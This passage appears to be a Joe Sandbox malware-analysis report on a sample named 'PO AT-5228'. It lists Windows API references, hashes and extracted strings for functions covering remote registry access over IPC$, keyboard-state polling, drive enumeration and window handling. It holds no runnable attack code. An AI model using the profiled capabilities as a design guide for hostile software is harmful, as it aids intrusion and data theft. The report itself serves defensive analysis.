                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2889450990-3420473620
                                                                                        • Opcode ID: a04d3f5d8ab2da43e760d4fb3ee27c1474e9ef31aa132f9f779ff4291bcceffa
                                                                                        • Instruction ID: c97e7eb9042389d6ba001536de5fd121b24c39dfd75d328df1f70fa7c5cc7999
                                                                                        • Opcode Fuzzy Hash: a04d3f5d8ab2da43e760d4fb3ee27c1474e9ef31aa132f9f779ff4291bcceffa
                                                                                        • Instruction Fuzzy Hash: 46517F71900249AACF25EBE0CD42EEEBBB8EF15344F1001A5F505720A2EB756F99DF61
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA55D7
                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00BA5664
                                                                                        • GetMenuItemCount.USER32(00C21708), ref: 00BA56ED
                                                                                        • DeleteMenu.USER32(00C21708,00000005,00000000,000000F5,?,?), ref: 00BA577D
                                                                                        • DeleteMenu.USER32(00C21708,00000004,00000000), ref: 00BA5785
                                                                                        • DeleteMenu.USER32(00C21708,00000006,00000000), ref: 00BA578D
                                                                                        • DeleteMenu.USER32(00C21708,00000003,00000000), ref: 00BA5795
                                                                                        • GetMenuItemCount.USER32(00C21708), ref: 00BA579D
                                                                                        • SetMenuItemInfoW.USER32(00C21708,00000004,00000000,00000030), ref: 00BA57D3
                                                                                        • GetCursorPos.USER32(?), ref: 00BA57DD
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00BA57E6
                                                                                        • TrackPopupMenuEx.USER32(00C21708,00000000,?,00000000,00000000,00000000), ref: 00BA57F9
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BA5805
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3993528054-0
                                                                                        • Opcode ID: 5a61aca236f08ad4aaa885654b661bcaf2f0ccaff53bfb58eb683f93b052c129
                                                                                        • Instruction ID: 82a282370cc40674dd3c098ec7f813de0a07eb5f6ed4404d5e481aaeef05132c
                                                                                        • Opcode Fuzzy Hash: 5a61aca236f08ad4aaa885654b661bcaf2f0ccaff53bfb58eb683f93b052c129
                                                                                        • Instruction Fuzzy Hash: 4671E370649605BEEB309F58CC89FAABFE5FF42364F240286F6156A1E0CBB15D10DB90
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B9A1DC
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B9A211
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B9A22D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B9A249
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B9A273
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00B9A29B
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B9A2A6
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B9A2AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 1687751970-22481851
                                                                                        • Opcode ID: 45db9a6bc7323269785a3d2f0064974c8026a45e67237f34d043ef1a7aa44d62
                                                                                        • Instruction ID: 6b207d78799008a8df06dc57e533ee7eb76f35d4f74e29e271c905d436dd8d95
                                                                                        • Opcode Fuzzy Hash: 45db9a6bc7323269785a3d2f0064974c8026a45e67237f34d043ef1a7aa44d62
                                                                                        • Instruction Fuzzy Hash: 2C410576C10229AADF21EBA4DC95DEDB7B8FF04300F0441A9F805B71A1EB749E15CB90
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 3964851224-909552448
                                                                                        • Opcode ID: 263b8426f18ccdb5aa092764c89dc91e6b9f45bfa3bc969262cc9d89ccfb0e52
                                                                                        • Instruction ID: 78ea50a94d972742314d64188b5ca136545c331db783d8f102f06a0fb6786918
                                                                                        • Opcode Fuzzy Hash: 263b8426f18ccdb5aa092764c89dc91e6b9f45bfa3bc969262cc9d89ccfb0e52
                                                                                        • Instruction Fuzzy Hash: 744152741102498BCF05EF14D891EEA37E9EF16700F5084E8FC661B191EB70DE5ACB10
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BD36F4,00000010,?,Bad directive syntax error,00BFDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00BA25D6
                                                                                        • LoadStringW.USER32(00000000,?,00BD36F4,00000010), ref: 00BA25DD
                                                                                        • _wprintf.LIBCMT ref: 00BA2610
                                                                                        • __swprintf.LIBCMT ref: 00BA2632
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BA26A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 1080873982-4153970271
                                                                                        • Opcode ID: 32cfc06c9c80c7112a7bbf7e7ebbea0cdf7dc9ef29bb37dceb0d2e9375641c0b
                                                                                        • Instruction ID: 0ad33d0d16b354ca447c5f17c542ed6392215fcc296f021bec77822c2b7ec1a7
                                                                                        • Opcode Fuzzy Hash: 32cfc06c9c80c7112a7bbf7e7ebbea0cdf7dc9ef29bb37dceb0d2e9375641c0b
                                                                                        • Instruction Fuzzy Hash: 8B217E3180025AAFCF11BF94CC4AEEE7BB9BF19304F0404A9F505670A2DA75A669DB50
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BA7B42
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BA7B58
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BA7B69
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BA7B7B
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BA7B8C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 890592661-1007645807
                                                                                        • Opcode ID: 0329af34fbbd08dc4b8d9473959cda07139e61c878b6adde815b42c1c786d4f0
                                                                                        • Instruction ID: 35895733d4de2ca254adfce682c8eb21fb43b0e40f3883c87c57716e6657e654
                                                                                        • Opcode Fuzzy Hash: 0329af34fbbd08dc4b8d9473959cda07139e61c878b6adde815b42c1c786d4f0
                                                                                        • Instruction Fuzzy Hash: 1F11B2E1A842A979D720A361CC9ADFF7EFCEB93B14F4005A97411A60C1DEA00E85C6B0
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00BA7794
                                                                                          • Part of subcall function 00B7DC38: timeGetTime.WINMM(?,75C0B400,00BD58AB), ref: 00B7DC3C
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00BA77C0
                                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00BA77E4
                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00BA7806
                                                                                        • SetActiveWindow.USER32 ref: 00BA7825
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BA7833
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00BA7852
                                                                                        • Sleep.KERNEL32(000000FA), ref: 00BA785D
                                                                                        • IsWindow.USER32 ref: 00BA7869
                                                                                        • EndDialog.USER32(00000000), ref: 00BA787A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        • Opcode ID: 81bf572c0ed04a8256d791d69d7c608b9a5d07021a91c99bc16dd81d73d13018
                                                                                        • Instruction ID: da8d7e0391a6eeadd86f0bb48f05b70139838b553c429d3731470f36c2b8f769
                                                                                        • Opcode Fuzzy Hash: 81bf572c0ed04a8256d791d69d7c608b9a5d07021a91c99bc16dd81d73d13018
                                                                                        • Instruction Fuzzy Hash: 2421547025C685AFE7115B20ECCDB2A3FA9FB46349F0001A4F50696572CFBD5D02DB21
                                                                                        APIs
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • CoInitialize.OLE32(00000000), ref: 00BB034B
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BB03DE
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00BB03F2
                                                                                        • CoCreateInstance.OLE32(00BEDA8C,00000000,00000001,00C13CF8,?), ref: 00BB043E
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BB04AD
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00BB0505
                                                                                        • _memset.LIBCMT ref: 00BB0542
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00BB057E
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BB05A1
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00BB05A8
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00BB05DF
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00BB05E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        • Opcode ID: 435b75d06b0c75214a7c672162b4cf87321cce146d135d930d342e616478bd16
                                                                                        • Instruction ID: 11efd104af43bd1528279da93717f3436ed896864b057b50ed37daf920ce9c89
                                                                                        • Opcode Fuzzy Hash: 435b75d06b0c75214a7c672162b4cf87321cce146d135d930d342e616478bd16
                                                                                        • Instruction Fuzzy Hash: DAB1D875A10109AFDB14EFA4C898DAEBBF9FF48304B1484A9E806EB251DB74ED45CB50
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00BA2ED6
                                                                                        • SetKeyboardState.USER32(?), ref: 00BA2F41
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00BA2F61
                                                                                        • GetKeyState.USER32(000000A0), ref: 00BA2F78
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00BA2FA7
                                                                                        • GetKeyState.USER32(000000A1), ref: 00BA2FB8
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00BA2FE4
                                                                                        • GetKeyState.USER32(00000011), ref: 00BA2FF2
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00BA301B
                                                                                        • GetKeyState.USER32(00000012), ref: 00BA3029
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00BA3052
                                                                                        • GetKeyState.USER32(0000005B), ref: 00BA3060
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 231d8d431d4528cd64d44755f4ce96e65ecae44fb823cde1a58c5e711117f2dd
                                                                                        • Instruction ID: 41f57a99a2d6bb3db0fa6b1019a2ca55dd97ba214fc522ed1377d22fd2d91494
                                                                                        • Opcode Fuzzy Hash: 231d8d431d4528cd64d44755f4ce96e65ecae44fb823cde1a58c5e711117f2dd
                                                                                        • Instruction Fuzzy Hash: 3951C524A0C79429FB35DBA888517AABFF4DF13740F0885DDD5C25A1C2DB949B8CC7A2
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B9ED1E
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00B9ED30
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B9ED8E
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00B9ED99
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00B9EDAB
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B9EE01
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00B9EE0F
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00B9EE20
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B9EE63
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00B9EE71
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B9EE8E
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00B9EE9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: 464101e47fff4ef0c9b00a49b1aa646c40eb7a251dfc1fe11a9399d2a013df17
                                                                                        • Instruction ID: efad0541b367543494da01a1f100a4ca007d3af5ec33c1a1447962871fd7ca92
                                                                                        • Opcode Fuzzy Hash: 464101e47fff4ef0c9b00a49b1aa646c40eb7a251dfc1fe11a9399d2a013df17
                                                                                        • Instruction Fuzzy Hash: DE51FE71B00605AFDF18CF69DD85AAEBBBAEB88701F148579F51AD7290DBB0DD008B10
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B7B759,?,00000000,?,?,?,?,00B7B72B,00000000,?), ref: 00B7BA58
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B7B72B), ref: 00B7B7F6
                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00B7B88D
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00BDD8A6
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00BDD8D7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00BDD8EE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B7B72B,00000000,?,?,00B7B2EF,?,?), ref: 00BDD90A
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BDD91C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        • Opcode ID: 715bd1022a551f9bcbfbf35992fd1389606d114a257f3ff190d6264c1666c55f
                                                                                        • Instruction ID: 018642da8d77d04aa1222df86bce216a19e86f3f6ca439d33952d259e2138fd7
                                                                                        • Opcode Fuzzy Hash: 715bd1022a551f9bcbfbf35992fd1389606d114a257f3ff190d6264c1666c55f
                                                                                        • Instruction Fuzzy Hash: 13619C30511600DFDB369F18D888B29B7F5FFA0311F1981AEE49A8BA60DB75AC81DF41
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B526: GetWindowLongW.USER32(?,000000EB), ref: 00B7B537
                                                                                        • GetSysColor.USER32(0000000F), ref: 00B7B438
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        • Opcode ID: 83500d309e5254f3460dc8925659821ceab803aa7c65dbe19974026267991373
                                                                                        • Instruction ID: ad294f42d1d7c74fea6b0222d2ebb820c5f2b5b83f8b081a44ef162b7f79be59
                                                                                        • Opcode Fuzzy Hash: 83500d309e5254f3460dc8925659821ceab803aa7c65dbe19974026267991373
                                                                                        • Instruction Fuzzy Hash: 79417F31100154AFDF205F28D889FB93BA6EB55721F1882A5FDB99F2E6DB708C41DB21
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                        • String ID:
                                                                                        • API String ID: 136442275-0
                                                                                        • Opcode ID: 59a312776b0d0559b984b1857b296518def4bbb94ae9298b2966477cb4a9d801
                                                                                        • Instruction ID: 0bd5a3006a1cbd208018b96f255ee140aa21145daae7b31443bbb769eb347bad
                                                                                        • Opcode Fuzzy Hash: 59a312776b0d0559b984b1857b296518def4bbb94ae9298b2966477cb4a9d801
                                                                                        • Instruction Fuzzy Hash: 2F41FAB784511CAECB65EB94CC86DDB73FCEB44300F0041E6BA59A2051EA70ABE9CF54
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(00BFDC00,00BFDC00,00BFDC00), ref: 00BAD7CE
                                                                                        • GetDriveTypeW.KERNEL32(?,00C13A70,00000061), ref: 00BAD898
                                                                                        • _wcscpy.LIBCMT ref: 00BAD8C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        • Opcode ID: ee2025ec5fecb53667d942573368e223a24b7611bf6834638a74e2cee77abb0d
                                                                                        • Instruction ID: 6738aa15986e60e3b223dcf6e472af3e932308f0fe07a62a5cb32b265111b1ae
                                                                                        • Opcode Fuzzy Hash: ee2025ec5fecb53667d942573368e223a24b7611bf6834638a74e2cee77abb0d
                                                                                        • Instruction Fuzzy Hash: 9C51C6751083409FC700EF14C881AAFB7E9EF86314F1088ADF5AA576A2EB35DE05DB42
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 00B693AB
                                                                                        • __itow.LIBCMT ref: 00B693DF
                                                                                          • Part of subcall function 00B81557: _xtow@16.LIBCMT ref: 00B81578
                                                                                        Strings
                                                                                        Memory Dump Source
